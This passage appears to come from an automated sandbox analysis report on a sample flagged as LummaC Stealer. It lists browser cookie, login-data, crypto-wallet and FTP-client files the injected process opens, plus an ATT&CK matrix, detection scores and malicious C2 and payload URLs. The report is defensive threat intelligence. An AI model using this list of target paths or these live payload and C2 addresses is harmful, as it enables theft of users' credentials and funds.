Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 6484, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
nlJ2sNaZVi.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
nlJ2sNaZVi.exe	100%	Avira	HEUR/AGEN.1306918
nlJ2sNaZVi.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://147.45.44.131	0%	Avira URL Cloud	safe
https://marshal-zhukov.com/apiya	100%	Avira URL Cloud	malware
netwrokenb.cyou	0%	Avira URL Cloud	safe
https://netwrokenb.cyou/api	0%	Avira URL Cloud	safe
https://marshal-zhukov.com:443/apiicrosoft	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/tbh75.exeP	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/tbh75.exe	100%	Avira URL Cloud	malware
https://marshal-zhukov.com:443/apiK	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
marshal-zhukov.com	188.114.96.3	true	false	high
netwrokenb.cyou	188.114.96.3	true	true	unknown
rottieud.sbs	unknown	unknown	true	unknown
tamedgeesy.sbs	unknown	unknown	true	unknown
brownieyuz.sbs	unknown	unknown	true	unknown
repostebhu.sbs	unknown	unknown	false	high
explainvees.sbs	unknown	unknown	true	unknown
relalingj.sbs	unknown	unknown	true	unknown
thinkyyokej.sbs	unknown	unknown	true	unknown
ducksringjk.sbs	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tamedgeesy.sbs	false		high
rottieud.sbs	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
repostebhu.sbs	false		high
thinkyyokej.sbs	false		high
netwrokenb.cyou	true	Avira URL Cloud: safe	unknown
ducksringjk.sbs	false		high
https://netwrokenb.cyou/api	true	Avira URL Cloud: safe	unknown
brownieyuz.sbs	false		high
https://marshal-zhukov.com/api	false		high
http://147.45.44.131/infopage/tbh75.exe	true	Avira URL Cloud: malware	unknown
relalingj.sbs	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://147.45.44.131	nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.youtube.com	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/tbh75.exeP	nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://medal.tv	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com/apiya	RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/;Persist#	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com:443/apiicrosoft	RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com/	RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209520966.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209577928.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com:443/api	RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
